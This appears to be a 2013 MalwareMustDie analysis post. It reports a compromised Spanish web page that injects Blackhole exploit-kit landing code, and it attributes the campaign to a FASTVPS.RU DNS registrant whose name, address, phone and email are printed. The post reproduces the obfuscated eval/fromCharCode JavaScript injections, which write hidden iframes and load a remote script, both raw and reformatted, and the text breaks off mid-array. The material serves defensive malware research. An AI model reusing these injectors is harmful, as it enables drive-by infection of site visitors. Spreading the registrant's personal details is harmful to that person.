FASTVPS.RU DNS is used to spread multiple EK infectors

MalwareMustDie, Jan 2nd, 2013
  1. =====================================================
  2. #MalwareMustDie! Happy New Year Case:
  3. FASTVPS.RU DNS Service is being used to spread
  4. multiple Blackhole Landing Page infections.
  5.  
  6. Bad actor's ID is:
  7. Registrant ID:55f7cab898d98545
  8. Registrant Name:Stepan  Ahmethanov
  9. Registrant Organization:
  10. Registrant Street1:Prospekt Mira 28
  11. Registrant Street2:
  12. Registrant Street3:
  13. Registrant City:Moscow
  14. Registrant State/Province:Moscow
  15. Registrant Postal Code:129074
  16. Registrant Country:RU
  17. Registrant Phone:+7.9653428756
  18. Registrant Phone Ext.:
  19. Registrant FAX:
  20. Registrant FAX Ext.:
  21. Registrant Email:keyb@exchangezones.net
  22.  
  23. ----
  24. [0x00000000]> !date
  25. Wed Jan  2 19:48:55 JST 2013
  26. =====================================================
  27.  
  28. Infector Evidence:
  29. http://urlquery.net/report.php?id=581367
  30.  
  31. Infector url:
  32. h00p://perso.wanadoo.es/idiomavalencia/ilinks.htm
  33.  
  34. // download evidence:
  35.  
  36. --19:14:33--  h00p://perso.wanadoo.es/idiomavalencia/ilinks.htm
  37.           => `ilinks.htm'
  38. Resolving perso.wanadoo.es... seconds 0.00, 62.37.237.60
  39. Caching perso.wanadoo.es => 62.37.237.60
  40. Connecting to perso.wanadoo.es|62.37.237.60|:80... seconds 0.00, connected.
  41.  
  42. ---request begin---
  43. GET /idiomavalencia/ilinks.htm h00p/1.0
  44. Referer: http://perso.wanadoo.es
  45. User-Agent: #MalwareMustDie Wishes you Miserable New Year 2013!!
  46. Accept: */*
  47. Host: perso.wanadoo.es
  48. Connection: Keep-Alive
  49.  
  50. ---request end---
  51. http request sent, awaiting response...
  52. ---response begin---
  53. HTTP/1.1 200 OK
  54. Date: Wed, 02 Jan 2013 10:14:29 GMT
  55. Server: Apache/1.3.26 (Unix) mod_layout/3.2
  56. X-Powered-By: ModLayout/3.2
  57. Connection: close
  58. Content-Type: text/html
  59.  
  60. ---response end---
  61. 200 OK
  62. Length: unspecified [text/html]
  63. 19:14:35 (24.40 KB/s) - `ilinks.htm' saved [32665]
  64.  
  65. // refer to the downloaded HTM file -
  66. // it has an evil script after the body tag
  67.  
  68. <script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-0.75,-0.75,23.25,22.5,5,7,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,7.25,27.75,0.25,-0.75,-0.75,-0.75,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,11.75,0.25,-0.75,-0.75,28.25,5,22.25,24,25.75,22.25,5,27.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,26.75,25.5,23.25,26,22.25,7,5.5,12,23.25,22.5,25.5,21.25,24.25,22.25,5,25.75,25.5,21.75,12.25,6.75,23,26,26,25,11.5,8.75,8.75,22.25,26.5,24,22.25,27,11,9,8.5,23.25,24.5,8.75,6.75,5,26.75,23.25,22,26,23,12.25,6.75,9.25,9,6.75,5,23,22.25,23.25,22.75,23,26,12.25,6.75,9.25,9,6.75,5,25.75,26,27.25,24,22.25,12.25,6.75,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,11.5,23,23.25,22,22,22.25,24.5,11.75,25,24.75,25.75,23.25,26,23.25,24.75,24.5,11.5,21.25,21.5,25.75,24.75,24,26.25,26,22.25,11.75,24,22.25,22.5,26,11.5,9,11.75,26,24.75,25,11.5,9,11.75,6.75,12.5,12,8.75,23.25,22.5,25.5,21.25,24.25,22.25,12.5,5.5,7.25,11.75,0.25,-0.75,-0.75,28.25,0.25,-0.75,-0.75,22.5,26.25,24.5,21.75,26,23.25,24.75,24.5,5,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,27.75,0.25,-0.75,-0.75,-0.75,26.5,21.25,25.5,5,22.5,5,12.25,5,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,21.75,25.5,22.25,21.25,26,22.25,14.25,24,22.25,24.25,22.25,24.5,26,7,6.75,23.25,22.5,25.5,21.25,24.25,22.25,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,25.75,25.5,21.75,6.75,8,6.75,23,26,26,25,11.5,8.75,8.75,22.25,26.5,24,22.25,27,11,9,8.5,23.25,24.5,8.75,6.75,7.25,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,12.25,6.75,23,23.25,22,22,22.25,24.5,6.75,11.75,22.5,
8.5,25.75,26,27.25,24,22.25,8.5,25,24.75,25.75,23.25,26,23.25,24.75,24.5,12.25,6.75,21.25,21.5,25.75,24.75,24,26.25,26,22.25,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,24,22.25,22.5,26,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26,24.75,25,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,26.75,23.25,22,26,23,6.75,8,6.75,9.25,9,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,23,22.25,23.25,22.75,23,26,6.75,8,6.75,9.25,9,6.75,7.25,11.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,8.5,21.25,25,25,22.25,24.5,22,13.75,23,23.25,24,22,7,22.5,7.25,11.75,0.25,-0.75,-0.75,28.25];for(i=6-2-1-2-1;i-545!=0;i++){k=i;ss=ss+String["from"+"CharCode"](-1*2*h*(3+1*n[k]));}e(ss);}</script><script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-0.75,-0.75,23.25,22.5,5,7,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,7.25,27.75,0.25,-0.75,-0.75,-0.75,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,11.75,0.25,-0.75,-0.75,28.25,5,22.25,24,25.75,22.25,5,27.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,26.75,25.5,23.25,26,22.25,7,5.5,12,23.25,22.5,25.5,21.25,24.25,22.25,5,25.75,25.5,21.75,12.25,6.75,23,26,26,25,11.5,8.75,8.75,21.25,22.75,24,22.25,27,10.75,9,8.5,23.25,24.5,8.75,6.75,5,26.75,23.25,22,26,23,12.25,6.75,9.25,9,6.75,5,23,22.25,23.25,22.75,23,26,12.25,6.75,9.25,9,6.75,5,25.75,26,27.25,24,22.25,12.25,6.75,26.5,23.25,25.75,23.25,21.5,23.25,24
,23.25,26,27.25,11.5,23,23.25,22,22,22.25,24.5,11.75,25,24.75,25.75,23.25,26,23.25,24.75,24.5,11.5,21.25,21.5,25.75,24.75,24,26.25,26,22.25,11.75,24,22.25,22.5,26,11.5,9,11.75,26,24.75,25,11.5,9,11.75,6.75,12.5,12,8.75,23.25,22.5,25.5,21.25,24.25,22.25,12.5,5.5,7.25,11.75,0.25,-0.75,-0.75,28.25,0.25,-0.75,-0.75,22.5,26.25,24.5,21.75,26,23.25,24.75,24.5,5,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,27.75,0.25,-0.75,-0.75,-0.75,26.5,21.25,25.5,5,22.5,5,12.25,5,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,21.75,25.5,22.25,21.25,26,22.25,14.25,24,22.25,24.25,22.25,24.5,26,7,6.75,23.25,22.5,25.5,21.25,24.25,22.25,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,25.75,25.5,21.75,6.75,8,6.75,23,26,26,25,11.5,8.75,8.75,21.25,22.75,24,22.25,27,10.75,9,8.5,23.25,24.5,8.75,6.75,7.25,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,12.25,6.75,23,23.25,22,22,22.25,24.5,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,25,24.75,25.75,23.25,26,23.25,24.75,24.5,12.25,6.75,21.25,21.5,25.75,24.75,24,26.25,26,22.25,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,24,22.25,22.5,26,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26,24.75,25,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,26.75,23.25,22,26,23,6.75,8,6.75,9.25,9,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,23,22.25,23.25,22.75,23,26,6.75,8,6.75,9.25,9,6.75,7.25,11.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,8.5,21.25,25,25,22.25,24.5,22,13.75,23,23.25,24,22,7,22.5,7.25,11.75,0.25,-0.75,-0.75,28.25];for(i=6-2-1-2-1;i-545!=0;i++){k=i;ss=ss+String["from"+"CharCode"](-1*2*h*(3+1*n[k]));}e(ss);}</script><script type="text/javascript" 
src="h00p://filehost101.in/tds777/social.js"></script><script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n="1.5$1.5$49.5$48$13$17$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$17.5$58.5$3.5$1.5$1.5$1.5$49.5$48$54$45.5$51.5$47.5$54$17$17.5$26.5$3.5$1.5$1.5$59.5$13$47.5$51$54.5$47.5$13$58.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$56.5$54$49.5$55$47.5$17$14$27$49.5$48$54$45.5$51.5$47.5$13$54.5$54$46.5$27.5$16.5$49$55$55$53$26$20.5$20.5$58$53$54.5$55$45.5$55$54.5$20$49.5$52$20.5$16.5$13$56.5$49.5$47$55$49$27.5$16.5$21.5$21$16.5$13$49$47.5$49.5$48.5$49$55$27.5$16.5$21.5$21$16.5$13$54.5$55$57.5$51$47.5$27.5$16.5$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$26$49$49.5$47$47$47.5$52$26.5$53$52.5$54.5$49.5$55$49.5$52.5$52$26$45.5$46$54.5$52.5$51$55.5$55$47.5$26.5$51$47.5$48$55$26$21$26.5$55$52.5$53$26$21$26.5$16.5$28$27$20.5$49.5$48$54$45.5$51.5$47.5$28$14$17.5$26.5$3.5$1.5$1.5$59.5$3.5$1.5$1.5$48$55.5$52$46.5$55$49.5$52.5$52$13$49.5$48$54$45.5$51.5$47.5$54$17$17.5$58.5$3.5$1.5$1.5$1.5$56$45.5$54$13$48$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$49.5$48$54$45.5$51.5$47.5$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$54.5$54$46.5$16.5$19$16.5$49$55$55$53$26$20.5$20.5$58$53$54.5$55$45.5$55$54.5$20$49.5$52$20.5$16.5$17.5$26.5$48$20$54.5$55$57.5$51$47.5$20$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$27.5$16.5$49$49.5$47$47$47.5$52$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$53$52.5$54.5$49.5$55$49.5$52.5$52$27.5$16.5$45.5$46$54.5$52.5$51$55.5$55$47.5$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$51$47.5$48$55$27.5$16.5$21$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$55$52.5$53$27.5$16.5$21$
16.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$56.5$49.5$47$55$49$16.5$19$16.5$21.5$21$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$49$47.5$49.5$48.5$49$55$16.5$19$16.5$21.5$21$16.5$17.5$26.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$48$17.5$26.5$3.5$1.5$1.5$59.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));for(i=6-2-1-2-1;i-545!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);}</script><script>if(window["document"])try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='qgode'["substr"](4-2);w=this;e=w[f["substr"](11)+zz];n="3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#19.5#60.5#5.5#3.5#3.5#3.5#51.5#50#56#47.5#53.5#49.5#56#19#19.5#28.5#5.5#3.5#3.5#61.5#15#49.5#53#56.5#49.5#15#60.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#58.5#56#51.5#57#49.5#19#16#29#51.5#50#56#47.5#53.5#49.5#15#56.5#56#48.5#29.5#18.5#51#57#57#55#28#22.5#22.5#48.5#53#54.5#47.5#54#56.5#22#54.5#56#50.5#22.5#18.5#15#58.5#51.5#49#57#51#29.5#18.5#23.5#23#18.5#15#51#49.5#51.5#50.5#51#57#29.5#18.5#23.5#23#18.5#15#56.5#57#59.5#53#49.5#29.5#18.5#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#28#51#51.5#49#49#49.5#54#28.5#55#54.5#56.5#51.5#57#51.5#54.5#54#28#47.5#48#56.5#54.5#53#57.5#57#49.5#28.5#53#49.5#50#57#28#23#28.5#57#54.5#55#28#23#28.5#18.5#30#29#22.5#51.5#50#56#47.5#53.5#49.5#30#16#19.5#28.5#5.5#3.5#3.5#61.5#5.5#3.5#3.5#50#57.5#54#48.5#57#51.5#54.5#54#15#51.5#50#56#47.5#53.5#49.5#56#19#19.5#60.5#5.5#3.5#3.5#3.5#58#47.5#56#15#50#15#29.5#15#49#54.5#48.5#57.5#53.5#49.5#54#57#22#48.5#56#49.5#47.5#57#49.5#33.5#53#49.5#53.5#49.5#54#57#19#18.5#51.5
#50#56#47.5#53.5#49.5#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#56.5#56#48.5#18.5#21#18.5#51#57#57#55#28#22.5#22.5#48.5#53#54.5#47.5#54#56.5#22#54.5#56#50.5#22.5#18.5#19.5#28.5#50#22#56.5#57#59.5#53#49.5#22#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#29.5#18.5#51#51.5#49#49#49.5#54#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#55#54.5#56.5#51.5#57#51.5#54.5#54#29.5#18.5#47.5#48#56.5#54.5#53#57.5#57#49.5#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#53#49.5#50#57#29.5#18.5#23#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#57#54.5#55#29.5#18.5#23#18.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#58.5#51.5#49#57#51#18.5#21#18.5#23.5#23#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#51#49.5#51.5#50.5#51#57#18.5#21#18.5#23.5#23#18.5#19.5#28.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#22#47.5#55#55#49.5#54#49#32.5#51#51.5#53#49#19#50#19.5#28.5#5.5#3.5#3.5#61.5"[((e)?"s":"")+"p"+"lit"]("a#"[((e)?"su":"")+"bstr"](1));try{q=document.createElement("div");q.appendChild(q);}catch(qw){h=-parseInt('012')/5;}
  69. for(i=6-2-1-2-1;i-545!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;if(e)e(""+q);}</script>
  70.  
  71. // I'll make it simple....
  72.  
  73.  <script>try
  74.  {
  75.    q=document.createElement("u");
  76.    q.appendChild(q+"");
  77.  }
  78.  catch(qw)
  79.  {
  80.    h=-012/5;
  81.    zz='a'+'l';
  82.    f='fr'+'o'+'m'+'Ch';
  83.    f+='arC';
  84.  }
  85.  try
  86.  {
  87.    begbe=prototype;
  88.  }
  89.  catch(b43gds)
  90.  {
  91.    zz='zv'.substr(123-122)+zz;
  92.    ss=[];
  93.    f+=(h)?'ode':"";
  94.    w=this;
  95.    e=w[f.substr(11)+zz];
  96.    n=[-0.75,-0.75,23.25,22.5,5,7,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,7.25,27.75,0.25,-0.75,-0.75,-0.75,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,11.75,0.25,-0.75,-0.75,28.25,5,22.25,24,25.75,22.25,5,27.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,26.75,25.5,23.25,26,22.25,7,5.5,12,23.25,22.5,25.5,21.25,24.25,22.25,5,25.75,25.5,21.75,12.25,6.75,23,26,26,25,11.5,8.75,8.75,22.25,26.5,24,22.25,27,11,9,8.5,23.25,24.5,8.75,6.75,5,26.75,23.25,22,26,23,12.25,6.75,9.25,9,6.75,5,23,22.25,23.25,22.75,23,26,12.25,6.75,9.25,9,6.75,5,25.75,26,27.25,24,22.25,12.25,6.75,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,11.5,23,23.25,22,22,22.25,24.5,11.75,25,24.75,25.75,23.25,26,23.25,24.75,24.5,11.5,21.25,21.5,25.75,24.75,24,26.25,26,22.25,11.75,24,22.25,22.5,26,11.5,9,11.75,26,24.75,25,11.5,9,11.75,6.75,12.5,12,8.75,23.25,22.5,25.5,21.25,24.25,22.25,12.5,5.5,7.25,11.75,0.25,-0.75,-0.75,28.25,0.25,-0.75,-0.75,22.5,26.25,24.5,21.75,26,23.25,24.75,24.5,5,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,27.75,0.25,-0.75,-0.75,-0.75,26.5,21.25,25.5,5,22.5,5,12.25,5,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,21.75,25.5,22.25,21.25,26,22.25,14.25,24,22.25,24.25,22.25,24.5,26,7,6.75,23.25,22.5,25.5,21.25,24.25,22.25,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,25.75,25.5,21.75,6.75,8,6.75,23,26,26,25,11.5,8.75,8.75,22.25,26.5,24,22.25,27,11,9,8.5,23.25,24.5,8.75,6.75,7.25,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,12.25,6.75,23,23.25,22,22,22.25,24.5,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,25,24.75,25.75,23.25,26,23.25,24.75,24.5,12.25,6.75,21.25,21.5,25.75,24.75,24,26.25,26,22.25,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,24,22.25,22.5,26,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,26,
27.25,24,22.25,8.5,26,24.75,25,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,26.75,23.25,22,26,23,6.75,8,6.75,9.25,9,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,23,22.25,23.25,22.75,23,26,6.75,8,6.75,9.25,9,6.75,7.25,11.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,8.5,21.25,25,25,22.25,24.5,22,13.75,23,23.25,24,22,7,22.5,7.25,11.75,0.25,-0.75,-0.75,28.25];
  97.    for(i=6-2-1-2-1;i-545!=0;i++)
  98.    {
  99.      k=i;
  100.      ss=ss+String["from"+"CharCode"](-1*2*h*(3+1*n[k]));
  101.    }
  102.    e(ss);
  103.  }
  104.  </script><script>try
  105.  {
  106.    q=document.createElement("u");
  107.    q.appendChild(q+"");
  108.  }
  109.  catch(qw)
  110.  {
  111.    h=-012/5;
  112.    zz='a'+'l';
  113.    f='fr'+'o'+'m'+'Ch';
  114.    f+='arC';
  115.  }
  116.  try
  117.  {
  118.    begbe=prototype;
  119.  }
  120.  catch(b43gds)
  121.  {
  122.    zz='zv'.substr(123-122)+zz;
  123.    ss=[];
  124.    f+=(h)?'ode':"";
  125.    w=this;
  126.    e=w[f.substr(11)+zz];
  127.    n=[-0.75,-0.75,23.25,22.5,5,7,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,7.25,27.75,0.25,-0.75,-0.75,-0.75,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,11.75,0.25,-0.75,-0.75,28.25,5,22.25,24,25.75,22.25,5,27.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,26.75,25.5,23.25,26,22.25,7,5.5,12,23.25,22.5,25.5,21.25,24.25,22.25,5,25.75,25.5,21.75,12.25,6.75,23,26,26,25,11.5,8.75,8.75,21.25,22.75,24,22.25,27,10.75,9,8.5,23.25,24.5,8.75,6.75,5,26.75,23.25,22,26,23,12.25,6.75,9.25,9,6.75,5,23,22.25,23.25,22.75,23,26,12.25,6.75,9.25,9,6.75,5,25.75,26,27.25,24,22.25,12.25,6.75,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,11.5,23,23.25,22,22,22.25,24.5,11.75,25,24.75,25.75,23.25,26,23.25,24.75,24.5,11.5,21.25,21.5,25.75,24.75,24,26.25,26,22.25,11.75,24,22.25,22.5,26,11.5,9,11.75,26,24.75,25,11.5,9,11.75,6.75,12.5,12,8.75,23.25,22.5,25.5,21.25,24.25,22.25,12.5,5.5,7.25,11.75,0.25,-0.75,-0.75,28.25,0.25,-0.75,-0.75,22.5,26.25,24.5,21.75,26,23.25,24.75,24.5,5,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,27.75,0.25,-0.75,-0.75,-0.75,26.5,21.25,25.5,5,22.5,5,12.25,5,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,21.75,25.5,22.25,21.25,26,22.25,14.25,24,22.25,24.25,22.25,24.5,26,7,6.75,23.25,22.5,25.5,21.25,24.25,22.25,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,25.75,25.5,21.75,6.75,8,6.75,23,26,26,25,11.5,8.75,8.75,21.25,22.75,24,22.25,27,10.75,9,8.5,23.25,24.5,8.75,6.75,7.25,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,12.25,6.75,23,23.25,22,22,22.25,24.5,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,25,24.75,25.75,23.25,26,23.25,24.75,24.5,12.25,6.75,21.25,21.5,25.75,24.75,24,26.25,26,22.25,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,24,22.25,22.5,26,12.25,6.75,9,6.75,11.75,22.5,8.5,
25.75,26,27.25,24,22.25,8.5,26,24.75,25,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,26.75,23.25,22,26,23,6.75,8,6.75,9.25,9,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,23,22.25,23.25,22.75,23,26,6.75,8,6.75,9.25,9,6.75,7.25,11.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,8.5,21.25,25,25,22.25,24.5,22,13.75,23,23.25,24,22,7,22.5,7.25,11.75,0.25,-0.75,-0.75,28.25];
  128.    for(i=6-2-1-2-1;i-545!=0;i++)
  129.    {
  130.      k=i;
  131.      ss=ss+String["from"+"CharCode"](-1*2*h*(3+1*n[k]));
  132.    }
  133.    e(ss);
  134.  }
  135.  </script><script type="text/javascript" src="h00p://filehost101.in/tds777/social.js"></script><script>try
  136.  {
  137.    q=document.createElement("u");
  138.    q.appendChild(q+"");
  139.  }
  140.  catch(qw)
  141.  {
  142.    h=-012/5;
  143.    zz='a'+'l';
  144.    f='fr'+'o'+'m'+'Ch';
  145.    f+='arC';
  146.  }
  147.  try
  148.  {
  149.    qwe=prototype;
  150.  }
  151.  catch(brebr)
  152.  {
  153.    zz='zv'.substr(123-122)+zz;
  154.    ss=[];
  155.    f+=(h)?'ode':"";
  156.    w=this;
  157.    e=w[f.substr(11)+zz];
  158.    n="1.5$1.5$49.5$48$13$17$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$17.5$58.5$3.5$1.5$1.5$1.5$49.5$48$54$45.5$51.5$47.5$54$17$17.5$26.5$3.5$1.5$1.5$59.5$13$47.5$51$54.5$47.5$13$58.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$56.5$54$49.5$55$47.5$17$14$27$49.5$48$54$45.5$51.5$47.5$13$54.5$54$46.5$27.5$16.5$49$55$55$53$26$20.5$20.5$58$53$54.5$55$45.5$55$54.5$20$49.5$52$20.5$16.5$13$56.5$49.5$47$55$49$27.5$16.5$21.5$21$16.5$13$49$47.5$49.5$48.5$49$55$27.5$16.5$21.5$21$16.5$13$54.5$55$57.5$51$47.5$27.5$16.5$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$26$49$49.5$47$47$47.5$52$26.5$53$52.5$54.5$49.5$55$49.5$52.5$52$26$45.5$46$54.5$52.5$51$55.5$55$47.5$26.5$51$47.5$48$55$26$21$26.5$55$52.5$53$26$21$26.5$16.5$